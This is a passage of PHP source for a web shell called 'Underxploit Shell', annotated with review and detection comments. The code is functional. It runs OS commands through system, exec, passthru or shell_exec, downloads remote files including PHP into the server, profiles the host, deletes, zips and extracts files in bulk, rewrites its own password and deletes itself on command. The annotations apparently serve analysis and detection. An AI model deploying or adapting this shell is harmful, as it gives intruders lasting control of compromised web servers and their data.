  423. echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="lime">[</font> '.basename($_COEG['file']).' <font color="lime">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  424. <hr><table>';
  425. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  426. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  427. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  428. <th><button class='coL-btn-option-active'><i class='fa fa-cogs'></i></button></th>
  429. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  430. echo "<div class='coL-option top'>
  431. <br><br><br>
  432.     <center>
  433.         <i class='fa fa-file-o fa-3x'></i></center><br><br>";
  434. echo "<form action='?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
  435. <table cellspacing='0'>
  436.     <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'>
  437. <input type='text' value='".substr(sprintf("%o", fileperms($_COEG['file'])), -4)."' name='perm' style='width:100%'>
  438. <input type='hidden' name='path' value='".$_COEG['file']."'></td><td style='width:20%'>
  439.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
  440.     </form></div></div>";
  441. }
  442.  
  443. // --- delete file --- //
  444. elseif($_COEG['command'] == 'delete') {
  445. $delete = unlink($_COEG['file']);
  446. if($delete) {
  447.         echo('<script>c("?'.x5.$dir.'");</script>');
  448.     } else {
  449.         error('Permission Denied !!');
  450.     }
  451. }
  452.  
  453. // --- change password --- //
  454. elseif($_COEG['command'] == 'change') {
  455. echo('<div class="coL-panel"><table>
  456. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">CHANGE PASSWORD</td></table></div>');
  457. echo('<script>
  458. function validate(){
  459.             var a = document.getElementById("newpass").value;
  460.            var b = document.getElementById("confirm").value;
  461.            if (a!=b) {');
  462.       s('Password Do Not Match !!');
  463.             echo('return false;
  464.     }
  465. }
  466.     </script>');
  // Returns the contents of $file via file_get_contents(). Declared inside the `change`
  // command branch, so it exists only on requests that reach that branch.
  467. function xs($file){
  468.     return file_get_contents($file);
  469. }
  // Returns the plain, unsalted md5() of $plain; this is the digest format stored in $pass.
  470. function chipt($plain){
  471.         return md5($plain);
  472. }
  /**
   * Replace the stored password digest by rewriting this script's own source file.
   *
   * Builds a new `$pass = "<md5>";` statement from $plain, reads the running script
   * ($_SERVER['SCRIPT_FILENAME']), substitutes every match of the $pass-assignment pattern, and
   * writes the file back. Returns file_put_contents()'s result (byte count, or false on failure).
   *
   * NOTE(review): because the file edits itself, its hash, size and modification time change
   * after a password change. A file hash is therefore not a stable indicator for deployed
   * copies; content or structure matching is more reliable.
   */
  473. function changepass($plain){
  474.     $npass = chipt($plain);
  475.     $npass = "\$pass = \"".$npass."\";";
  476.     $con = xs($_SERVER['SCRIPT_FILENAME']);
  477.     $con = preg_replace("/\\\$pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$npass,$con);
  478.     return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
  479. }
  480.  
  481. if($_COEG['newpass']) {
  482. if(changepass($_COEG['newpass'])) {
  483. success('Password Changed !!');
  484. mtr('?'.x5.$dir.'&'.x7.'logout');
  485. } else {
  486. error('Unable To Change Password !!');
  487.     }
  488. }
  489. echo "<div class='coL-option top'>
  490. <form method='post' onSubmit='return validate();' action='?".x7."change&".x5.$dir."'><table style='width:100%'>
  491. <td style='width:120px'>Password :</td><td style='width:75%'><input type='password' id='newpass' name='newpass' style='width:100%'></td>
  492. <tr>
  493. <td style='width:120px'>Confirm :</td><td style='width:75%'><input type='password' id='confirm' name='confirm' style='width:100%'></td>
  494. <tr>
  495. <td style='width:120px'></td><td style='width:75%'>
  496. <button type='submit' name='cps' class='btn-exe' onclick='saveForm();return false;' style='width:100px'><i class='fa fa-arrow-circle-right'></i></button></td></table></form></div></div>";
  497. echo '<script>function saveForm(){
  498. if(document.getElementById("newpass").value == ""){';
  499.        s('Enter New Password !!');
  500.    echo'document.getElementById("newpass").focus();
  501.      return false;
  502.    }
  503. if(document.getElementById("confirm").value == ""){';
  504.       s('Confirm Your Password !!');
  505.    echo'return false;
  506.    }
  507.    document.getElementById("sks").submit();
  508.  }
  509. </script>';
  510. }
  511.  
  512. // --- kill me --- //
  513. elseif($_COEG['command'] == 'kill') {
  514. if(file_exists("underxploit.php"))
  515. unlink("underxploit.php");unlink(__FILE__);
  516.     success('Good Bye Baby :\')');
  517.     mtr('http://underxploit.blogspot.com');
  518. }
  519.  
  520. // --- rename directory --- //
  521. elseif($_COEG['command'] == 'renadir') {
  522.    $c = $_COEG['e'];
  523.     if($_COEG['e']) {
  524.         $e = rename($dir, "".dirname($dir)."/".htmlspecialchars($_COEG['e'])."");
  525.         if($e) {
  526. echo('<script>c("?'.x5.dirname($dir).'");</script>');
  527.     } else {
  528. error('Permission Denied !!');
  529.     }
  530. }
  531. echo('<div class="coL-panel"><table>
  532. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">RENAME DIRECTORY</td></table></div>');
  533. echo("<div class='coL-option top'>
  534. <br><br><br>
  535.     <center>
  536.         <i class='fa fa-folder-o fa-3x'></i></center><br><br>");
  537. echo("<form action='?".x7."renadir&".x5.$dir."' style='margin:0px' method='post'>
  538. <table cellspacing='0'>
  539.     <td align='center' style='width:10%'><i class='fa fa-folder-o'></i> </td><td style='width:70%'><input type='text' value='".basename($dir)."' name='e'></td><td style='width:20%'>
  540.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
  541.     </form></div></div>");
  542. }
  543.  
  544. // --- delete directory --- //
  545. elseif($_COEG['command'] == 'deledir') {
  546. $x0z1 = deledir($dir);
  547.  if($x0z1) {
  548.         echo("<script>window.location = '?".x5.dirname($dir)."';</script>");
  549.     } else {
  550.         echo("<script>window.location = '?".x5.dirname($dir)."';</script>");
  551.         error('Permission Denied !!');
  552.     }
  553. }
  554.  
  555. elseif($_COEG['command'] == 'about') {
  556.   echo '<div class="coL-panel"><table>
  557. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">DESCRIPTION</td></table></div>';
  558. echo '<div class="coL-option" style="padding:7px"><br>
  559.     <center><img class="animasi infinite anim1" src="'.x4.'logo.jpg" style="width:150px;height:150px;border-radius:100%;border:1px solid #ddd;padding:2px"></center><br><hr>
  560. &nbsp; &nbsp; Underxploit Shell adalah sebuah script filemanager website yang dapat memudahkan anda mengatur isi dari website yang anda kelola, dan pastinya saya rancang sangat responsive dan mudah di akses via apa saja.
  561. <br><br>
  562. &nbsp; &nbsp; Shell ini adalah recoded dari shell sebelumnya yaitu Mobile Shell V.05, untuk versi ini tidak ada tools hacking, namun hanya mengoptimalkan fitur filemanagernya saja seperti edit, delete, copy dll.
  563. <br><br>
  564. &nbsp; &nbsp; Berbeda dengan Mobile Shell V.05, pada shell ini ada beberapa perubahan tampilan pada background, font, panel icon, cover, navigasi, alert, dan form login.
  565. </div>
  566.  
  567. <div class="coL-panel top"><table>
  568. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">CREDITS</td></table></div>
  569. <table class="table-info">
  570. <tr class="ex-hov">
  571. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Name</td> <td class="td-info">: Underxploit Shell</td>
  572. <tr class="ex-hov">
  573. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Version</td> <td class="td-info">: 0.1 (Beta)</td>
  574. <tr class="ex-hov">
  575. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Author</td> <td class="td-info">: Wildan Izzudin</td>
  576. <tr class="ex-hov">
  577. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Email</td> <td class="td-info break">: <a class="a" href="mailto:underxploit@gmail.com">underxploit@gmail.com</a></td>
  578. <tr class="ex-hov">
  579. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Facebook</td> <td class="td-info break">:  <a class="a" href="http://www.facebook.com/WILDAN.OFFICIAL">http://fb.me/WILDAN.OFFICIAL</a></td>
  580. <tr class="ex-hov">
  581. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Blog</td> <td class="td-info">: <a class="a" href="http://underxploit.blogspot.co.id">http://underxploit.blogspot.co.id</a></td></table>
  582. <div class="coL-option to">
  583. <center><br>If there is any suggestion or feedback please contact me through the contact above.<br><br><center><br>&mdash; Thank You &mdash;</center></div></div>';
  584. }
  585.  
  // Handler for command=upload: two independent ways of writing a file under $dir.
  //  1. "Upload From Device": copies the uploaded temp file to $dir/<name>.
  //  2. "Upload From Internet": opens a request-supplied URL and streams it into $dir/<name>.
  // $dir, x5, x7, MS7Z, success() and error() are defined outside this excerpt.
  // Triage note: requests to this handler carry command=upload plus either a multipart "file"
  // part or "url"/"submit" fields, and the resulting files are written by the PHP process into
  // whatever directory $dir names.
  586. elseif($_COEG['command'] == 'upload') {
  587. echo '<div class="coL-panel"><table>
  588. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">MULTIPLE UPLOAD</td></table></div>';
  589. if(isset($_REQUEST['ufile'])) {
  590. $ufile = $_COEG['ufile'] ;
  591. }
  592. if(isset($_REQUEST['upload'])) {
  593. if($_COEG['upload']){
       // Destination name: the request-supplied "ufile" when non-empty, otherwise the
       // client-supplied original filename. No extension or content check is applied.
  594. if(empty($ufile)) {
  595.     $cx = $_FILES['file']['name'];
  596. } else {
  597.     $cx = $ufile;
  598. }
       // copy() is used on tmp_name without is_uploaded_file()/move_uploaded_file();
       // the @ prefix suppresses any warning it raises.
  599. if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$cx)) {
  600. success('File Uploaded !!');
  601. } else {
  602. error('Upload Failed !!');
  603.           } } }
  604. echo '<div class="coL-option"><span class="label-default">+</span> Upload From Device :<hr>';
  605. echo '<form enctype="multipart/form-data" action="?'.x7.'upload&'.x5.$dir.'"   method="POST" style="margin:0px">
  606. <table style="width:100%">
  607. <td style="width:20%">File :</td>
  608. <td style="width:80%">
  609. <input type="file" name="file"></td>
  610. <tr>
  611. <td style="width:20%">Name :</td>
  612. <td style="width:80%"><input name="ufile" type="text" placeholder="" value="" /></td>
  613. <tr>
  614. <td style="width:20%"></td>
  615. <td style="width:80%"><input type="submit" name="upload" style="width:100px" value="Upload" class="btn-exe" />
  616. </td></table></form></div>';
  617.  
       // Remote fetch: fopen() is called directly on the request-supplied "url", so the PHP
       // process opens whatever stream the server's wrapper configuration allows. On the
       // defending side this shows up as a connection originated by the web server itself,
       // which egress filtering and proxy logs can surface.
  618. if($_COEG["submit"]){
  619. $uname = $_COEG["uname"];
  620. $url = trim($_COEG["url"]);
  621. if($url){
  622. $file = fopen($url,"rb");
  623. if($file) {
       // The extension allowlist is applied to the URL's basename only, and it includes "php".
  624. $valid_exts = array("css","php","html","htm","txt","zip","rar","png","jpg","jpeg","gif","mp3","mp4","3gp");
  625. $ext = end(explode(".",strtolower(basename($url))));
  626. if(in_array($ext,$valid_exts)){
       // A non-empty "uname" replaces the saved filename and is not checked against the allowlist.
  627. if(empty($uname)) {
  628.      $filename = basename($url);
  629.  } else {
  630.     $filename = $uname;
  631. }
       // The body is streamed in MS7Z-sized reads; neither handle is closed in this branch.
  632. $newfile = fopen($dir.'/'.$filename, "wb");
  633. if($newfile){
  634. while(!feof($file)) {
  635. fwrite($newfile,fread($file,MS7Z), MS7Z);  }
  636. success('File Uploaded !!');
  637.  } else {
  638. error('Upload Failed !!');
  639.  } } else { error('Extension Not Supported !!');
  640. } } else { error('Link Invalid !!'); } } else { error('Link Empty !!');
  641. } }
  642. echo '<div class="coL-option top"><span class="label-default">+</span> Upload From Internet :<hr>';
  643. echo '<form action="?'.x7.'upload&'.x5.$dir.'"  method="POST">';
  644. echo '<table style="width:100%">
  645. <td style="width:20%">Link :</td>
  646. <td style="width:80%"><input type="text" name="url" placeholder="" style="width:100%"></td>
  647. <tr>
  648. <td style="width:20%">Name :</td>
  649. <td style="width:80%"><input type="text" name="uname" style="width:100%"></td>
  650. <tr>
  651. <td style="width:20%"></td><td style="width:80%"><input type="submit" name="submit" style="width:100px" value="Upload" class="btn-exe"></td></table></form>
  652. </div></div>';
  653. }
  654.  
  655. // --- system information --- //
  656. elseif ($_COEG['command'] == 'system') {
  // exe($ms_x): run the command string $ms_x on the host and return its output as a string.
  // It uses the first of system(), exec(), passthru(), shell_exec() for which function_exists()
  // is true; every call is prefixed with @, so PHP warnings are suppressed. When none of the
  // four is available the function falls off the end and returns null.
  // Declared inside the command=system branch, so it only exists once that branch has run.
  // Within this excerpt it is called only with the fixed strings 'wget --help', 'perl --help'
  // and 'python --help'.
  // Defensive note: these four are among the functions commonly restricted through
  // disable_functions, and a web-facing PHP worker spawning child processes is a useful
  // alerting signal for this kind of helper.
  657. function exe($ms_x) {  
  658. if(function_exists('system')) {        
         // system() prints directly, so its output is captured through an output buffer.
  659.         @ob_start();       
  660.         @system($ms_x);        
  661.         $ms_z = @ob_get_contents();        
  662.         @ob_end_clean();       
  663.         return $ms_z;  
  664.     } elseif(function_exists('exec')) {        
  665.         @exec($ms_x,$values);      
  666.         $ms_z = "";        
         // As written this loop appends $result, which is never assigned in this function,
         // so the exec() path returns an empty string.
  667.         foreach($values as $value) {           
  668.             $ms_z .= $result;      
  669.         } return $ms_z;    
  670.     } elseif(function_exists('passthru')) {        
  671.         @ob_start();       
  672.         @passthru($ms_x);      
  673.         $ms_z = @ob_get_contents();        
  674.         @ob_end_clean();       
  675.         return $ms_z;  
  676.     } elseif(function_exists('shell_exec')) {      
  677.         $ms_z = @shell_exec($ms_x);        
  678.         return $ms_z;  
  679.     }
  680. }
  // disk($dz): format a byte count for display. Values >= 1073741824 are shown in GB,
  // >= 1048576 in MB and >= 1024 in KB, each with two decimals ('%1.2f'); anything smaller is
  // returned as the raw number followed by ' B'. Used further down on disk_free_space("/") and
  // disk_total_space("/").
  681. function disk($dz) {
  682. if($dz >= 1073741824)
  683. return sprintf('%1.2f',$dz / 1073741824 ).' GB';
  684. elseif($dz >= 1048576)
  685. return sprintf('%1.2f',$dz / 1048576 ) .' MB';
  686. elseif($dz >= 1024)
  687. return sprintf('%1.2f',$dz / 1024 ) .' KB';
  688. else
  689. return $dz .' B';
  690. }
  // Substring helper: returns the part of $b_ms that lies between the first occurrence of
  // $c_ms and the next occurrence of $d_ms after it. Returns FALSE when either delimiter does
  // not occur in $b_ms. Not called anywhere in this excerpt.
  691. function fuck($b_ms, $c_ms, $d_ms){
  692.     if(strpos($b_ms, $c_ms) === FALSE) return FALSE;
  693.     if(strpos($b_ms, $d_ms) === FALSE) return FALSE;
         // $a_ms: offset just past the opening delimiter; $e_ms: offset of the closing delimiter.
  694.     $a_ms = strpos($b_ms, $c_ms) + strlen($c_ms);
  695.     $e_ms = strpos($b_ms, $d_ms, $a_ms);
  696.     $f_ms = substr($b_ms, $a_ms, $e_ms - $a_ms);
  697.     return $f_ms; }
  // Host reconnaissance for the "SYSTEM INFORMATION" panel. Everything computed here is echoed
  // into the HTML table that follows this run.
  // The APIs probed (magic quotes, safe_mode, mysql_connect) belong to older PHP releases,
  // which helps date the sample.
  // When magic quotes are reported as on, m_ms() recursively strips the added slashes from
  // the merged request array $_COEG.
  698. if(get_magic_quotes_gpc()) {
  699. function m_ms($n_ms) {
  700. return is_array($n_ms) ? array_map('m_ms', $n_ms) : stripslashes($n_ms); }
  701. $_COEG = m_ms($_COEG); }
  702.  
       // Each probe below yields a ready-made ON/OFF HTML label rather than a boolean.
  703. $safemode = (@ini_get(strtolower("safe_mode")) == 'on') ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  704.  
       // The disable_functions list is read as-is and later shown to the operator.
  705. $disablefunc = @ini_get("disable_functions");
  706. $mysql = (function_exists('mysql_connect')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  707.  
  708. $curl = (function_exists('curl_version')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
  709.  
       // The next three probes start wget, perl and python with --help through exe(); any
       // non-empty output counts as "ON". In process-creation telemetry this appears as the
       // PHP worker spawning those binaries in quick succession.
  710. $wget = (exe('wget --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  711.  
  712. $perl = (exe('perl --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
  713.  
  714. $python = (exe('python --help')) ? "
  715. <span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
  716.  
  717. $ds_men = (!empty($disablefunc)) ? "<span class='label-danger'>".$disablefunc."</span>" : "<span class='label-success'>NONE</span>";
       // Account the PHP process runs as: without the posix extension the script owner and the
       // process uid/gid are used and the group name is shown as "?"; with it, the effective
       // uid/gid are resolved to names through posix_getpwuid()/posix_getgrgid().
  718. if(!function_exists('posix_getegid')) {
  719.     $c_us = @get_current_user();
  720.     $c_id = @getmyuid();
  721.     $g_c = @getmygid();
  722.     $gr_p = "?";
  723. } else {
  724.     $c_id = @posix_getpwuid(posix_geteuid());
  725.     $g_c = @posix_getgrgid(posix_getegid());
  726.     $c_us = $c_id['name'];
  727.     $c_id = $c_id['uid'];
  728.     $gr_p = $g_c['name'];
  729.     $g_c = $g_c['gid'];
  730. }
  731. echo '<div class="coL-panel"><table>
  732. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">SYSTEM INFORMATION</td></table></div>';
  733. echo "<table width=100% class='table-info' cellspacing=0>
  734. <th class=th-info style=width:120px><center>Component</center></th>
  735. <th class=th-info><center>Arrow</center></th>
  736. <th class=th-info break><center>Result</center></th></tr>";
  737. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Server </td><td class='td-info' align='center'>&raquo;</td>
  738. <td class='td-info'> ".$_SERVER['SERVER_SOFTWARE']."</td></tr>";
  739. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  740. Username</td><td class='td-info' align='center'>&raquo;</td>
  741. <td class='td-info'> ".$c_us." [".$c_id."]</td></tr>";
  742. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  743. Group</td><td class='td-info' align='center'>&raquo;</td>
  744. <td class='td-info'>".$gr_p." [".$g_c."]</td></tr>";
  745. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  746. Server IP </td><td class='td-info' align='center'>&raquo;</td>
  747. <td class='td-info'>".gethostbyname($_SERVER['HTTP_HOST'])."</td></tr>";
  748. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  749. Your IP </td><td class='td-info' align='center'>&raquo;</td>
  750. <td class='td-info'> ".$_SERVER['REMOTE_ADDR']."</td></tr>";
  751. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  752. PHP Version</td><td class='td-info' align='center'>&raquo;</td>
  753. <td class='td-info'> ".@phpversion()."</td></tr>";
  754. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Disk Space</td> <td class='td-info' align='center'>&raquo;</td>
  755. <td class='td-info'>[".disk(disk_free_space("/"))."] / [".disk(disk_total_space("/"))."]</td></tr>";
  756. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Safe Mode</td><td class='td-info' align='center'>&raquo;</td>
  757. <td class='td-info'> $safemode</td></tr>";
  758. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> MySQL</td><td class='td-info' align='center'>&raquo;</td><td class='td-info'>$mysql</td></tr>";
  759. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
  760. Perl</td><td class='td-info' align='center'>&raquo;</td>
  761. <td class='td-info'> $perl </td></tr>";
  762. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Python</td><td class='td-info' align='center'>&raquo;</td>
  763. <td class='td-info'>$python</td></tr>";
  764. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> WGET</td><td class='td-info' align='center'>&raquo;</td>
  765. <td class='td-info'>$wget</td></tr>";
  766. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> CURL</td><td class='td-info' align='center'>&raquo;</td><td class='td-info'>$curl</td></tr>";
  767.  if(get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
  768.   echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes  </td><td class='td-info' align='center'>&raquo;</td>
  769. <td><span class='label label-success'>ON</span></tr>"; } else { echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes  </td><td class='td-info' align='center'>&raquo;</td><td class='td-info'><span class='label label-danger'>OFF</span></td></tr>"; }
  770. echo "</table>";  
  771. echo '<div class="coL-panel top"><table>
  772. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">KERNEL</td></table></div>';
  773. echo "<div class ='coL-option' style='margin-bottom:3px;padding:7px'>".php_uname()."</div>";
  774. echo '<div class="coL-panel top"><table>
  775. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">DISABLE FUNCTION</td></table></div>';
  776. echo "<div class='coL-option' style='padding:7px'>".$ds_men."</div></div>";
  777. }
  778.  
  779. // --- mass action --- //
  780. else {
  // Start of the default branch (file manager and mass actions).
  // Records the starting directory in $hc, changes into the request-supplied "location" if one
  // was sent (no validation is visible here, and @ hides a failed chdir), then stores the
  // resulting directory in $cwd with a trailing "/". $os is set outside this excerpt.
  781. $hc = @getcwd();
  782. if(isset($_COEG['location']))
  783.     @chdir($_COEG['location']);
  784. $cwd = @getcwd();
       // Windows paths are normalised to forward slashes.
  785. if($os == 'win') {
  786.     $hc = str_replace("\\", "/", $hc);
  787.     $cwd = str_replace("\\", "/", $cwd);
  788. }
  789. if($cwd[strlen($cwd)-1] != '/')
  790.     $cwd .= '/';
  791.  
  // hs($d): list the entries of directory $d. Returns scandir($d) when that function exists;
  // otherwise it collects readdir() results into $data and returns that. In the fallback path
  // $data is never initialised (an empty directory read yields null) and the handle is not closed.
  792. function hs($d) {
  793.     if(function_exists("scandir")) {
  794.         return scandir($d);
  795.     } else {
  796.         $dh  = opendir($d);
  797.         while (false !== ($filename = readdir($dh)))
  798.             $data[] = $filename;
  799.         return $data;
  800.     }
  801. }
  // Mass-action dispatcher. The selection ("msv5"), the pending action ("act") and the source
  // directory ("location") are kept in cookies between requests: the default case at the end of
  // the switch stores them with vb() -- serialize()-ing the selection -- and a later "paste"
  // request reads them back and acts on them.
  // NOTE(review): the cookie value is client-controlled and is passed to unserialize(), which
  // is a PHP object-injection sink whenever classes with magic methods are loaded. The @ prefix
  // hides the notice a malformed value would raise.
  802.   if(!empty($_COOKIE['msv5']))
  803.         $_COOKIE['msv5'] = @unserialize($_COOKIE['msv5']);
  804.      
  805.     if(!empty($_COEG['hcx'])) {
  806.         switch($_COEG['hcx']) {
                 // mkdir: creates the directory named by request field "p2".
  807.             case 'mkdir':
  808.                 if(!@mkdir($_COEG['p2']))
  809.                     echo "Can't create new dir";
  810.                 break;
                 // delete: deleteDir() removes a tree recursively. Each selected entry is
                 // urldecode()d and deleted relative to the current directory; nothing checks
                 // that the resulting path stays inside it.
  811.             case 'delete':
  812.                 function deleteDir($path) {
  813.                     $path = (substr($path,-1)=='/') ? $path:$path.'/';
  814.                     $dh  = opendir($path);
  815.                     while ( ($▟ = readdir($dh) ) !== false) {
  816.                         $▟ = $path.$▟;
  817.                         if ( (basename($▟) == "..") || (basename($▟) == ".") )
  818.                             continue;
  819.                         $type = filetype($▟);
  820.                         if ($type == "dir")
  821.                             deleteDir($▟);
  822.                         else
  823.                             @unlink($▟);
  824.                     }
  825.                     closedir($dh);
  826.                     @rmdir($path);
  827.                 }
  828.                 if(is_array(@$_COEG['msv5']))
  829.                     foreach($_COEG['msv5'] as $f) {
  830.                         if($f == '..')
  831.                             continue;
  832.                         $f = urldecode($f);
  833.                         if(is_dir($f))
  834.                             deleteDir($f);
  835.                         else
  836.                             @unlink($f);
  837.                     }
  838.                 break;
                 // paste: executes the action remembered in the "act" cookie on the entries in
                 // the "msv5" cookie, reading them from the "location" cookie's directory. All
                 // three values come from the client.
  839.             case 'paste':
  840.                 if($_COOKIE['act'] == 'copy') {
                         // copy_paste($c,$s,$d): recursively copies $c.$s to $d.$s.
  841.                     function copy_paste($c,$s,$d){
  842.                         if(is_dir($c.$s)){
  843.                             mkdir($d.$s);
  844.                             $h = @opendir($c.$s);
  845.                             while (($f = @readdir($h)) !== false)
  846.                                 if (($f != ".") and ($f != ".."))
  847.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  848.                         } elseif(is_file($c.$s))
  849.                             @copy($c.$s, $d.$s);
  850.                     }
  851.                     foreach($_COOKIE['msv5'] as $f)
  852.                         copy_paste($_COOKIE['location'],$f, $GLOBALS['cwd']);
  853.                 } elseif($_COOKIE['act'] == 'move') {
                         // move_paste() is declared but never called in this excerpt; the move
                         // itself is done with rename() in the loop below.
  854.                     function move_paste($c,$s,$d){
  855.                         if(is_dir($c.$s)){
  856.                             mkdir($d.$s);
  857.                             $h = @opendir($c.$s);
  858.                             while (($f = @readdir($h)) !== false)
  859.                                 if (($f != ".") and ($f != ".."))
  860.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  861.                         } elseif(@is_file($c.$s))
  862.                             @copy($c.$s, $d.$s);
  863.                     }
  864.                     foreach($_COOKIE['msv5'] as $f)
  865.                         @rename($_COOKIE['location'].$f, $GLOBALS['cwd'].$f);
  866.                 } elseif($_COOKIE['act'] == 'zip') {
                         // zip: packs the selected files and directory trees into the archive
                         // named by request field "p2".
  867.                     if(class_exists('ZipArchive')) {
  868.                         $zip = new ZipArchive();
  869.                         if ($zip->open($_COEG['p2'], 1)) {
  870.                             chdir($_COOKIE['location']);
  871.                             foreach($_COOKIE['msv5'] as $f) {
  872.                                 if($f == '..')
  873.                                     continue;
  874.                                 if(@is_file($_COOKIE['location'].$f))
  875.                                     $zip->addFile($_COOKIE['location'].$f, $f);
  876.                                 elseif(@is_dir($_COOKIE['location'].$f)) {
  877.                                     $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
  878.                                     foreach ($iterator as $key=>$value) {
  879.                                         $zip->addFile(realpath($key), $key);
  880.                                     }
  881.                                 }
  882.                             }
  883.                             chdir($GLOBALS['cwd']);
  884.                             $zip->close();
  885.                         }
  886.                     }
  887.                 } elseif($_COOKIE['act'] == 'unzip') {
                         // unzip: extracts each selected archive into the current directory;
                         // entry names inside the archive are not inspected here.
  888.                     if(class_exists('ZipArchive')) {
  889.                         $zip = new ZipArchive();
  890.                         foreach($_COOKIE['msv5'] as $f) {
  891.                             if($zip->open($_COOKIE['location'].$f)) {
  892.                                 $zip->extractTo($GLOBALS['cwd']);
  893.                                 $zip->close();
  894.                             }
  895.                         }
  896.                     }
  897.                 } elseif($_COOKIE['act'] == 'tar') {
                         // tar: builds a shell command and hands it to ex(), which is not defined
                         // in this excerpt (the helper visible here is exe()). The archive name
                         // and every selected entry go through escapeshellarg().
  898.                     chdir($_COOKIE['location']);
  899.                     $_COOKIE['msv5'] = array_map('escapeshellarg', $_COOKIE['msv5']);
  900.                     ex('tar cfzv ' . escapeshellarg($_COEG['p2']) . ' ' . implode(' ', $_COOKIE['msv5']));
  901.                     chdir($GLOBALS['cwd']);
  902.                 }
                     // The selection cookie is cleared once the paste has run.
  903.                 unset($_COOKIE['msv5']);
  904.                 setcookie('msv5', '', time() - 3600);
  905.                 break;
                 // Any other action value is remembered for a later "paste": action, serialized
                 // selection and source directory are written to cookies through vb().
  906.             default:
  907.                 if(!empty($_COEG['hcx'])) {
  908.                     vb('act', $_COEG['hcx']);
  909.                     vb('msv5', serialize(@$_COEG['msv5']));
  910.                     vb('location', @$_COEG['location']);
  911.                 }
  912.                 break;
  913.         }
  914.     }
  915. echo('<script>function m1s(){
  916. if(document.getElementById("act").value == ""){');
  917.    s('Select Action !!');
  918.     echo('  return false;
  919.    }
  920.    document.getElementById("sks").submit();
  921.  }
  922. </script>');
  923. echo('<form name="data" action="?dir='.$dir.'" method="POST" style="margin:0px">');
  924. echo('<div class="coL-panel"><table>
  925. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">FILE MANAGER</td></table></div>');
  926.        
  927.     $dirContent = hs(isset($_COEG['location'])?$_COEG['location']:$GLOBALS['cwd']);
  928.     if($dirContent === false) {    echo 'Can\'t open this folder!';hardFooter(); return; }
  929.     global $sort;
  930.     $sort = array('name', 1);
  931.     if(!empty($_COEG['hcx'])) {
  932.         if(preg_match('!s_([A-z]+)_(\d{1})!', $_COEG['hcx'], $match))
  933.             $sort = array($match[1], (int)$match[2]);
  934.     }
  935. echo('<script language="JavaScript">
  936. function toggle(source) {
  937.  checkboxes = document.getElementsByName("msv5[]");
  938.  for(var i=0, n=checkboxes.length;i<n;i++) {
  939.    checkboxes[i].checked = source.checked;
  940.  }
  941. }
  942. </script>');
  943. echo('<table class="table-file" cellspacing="0">
  944. <th class="th-file">Name</th>
  945. <th class="th-file" style="width:80px">Size</th>
  946. <th class="th-file" style="width:65px">Action</th>
  947. <th class="th-file"></th>
  948. <tr>');
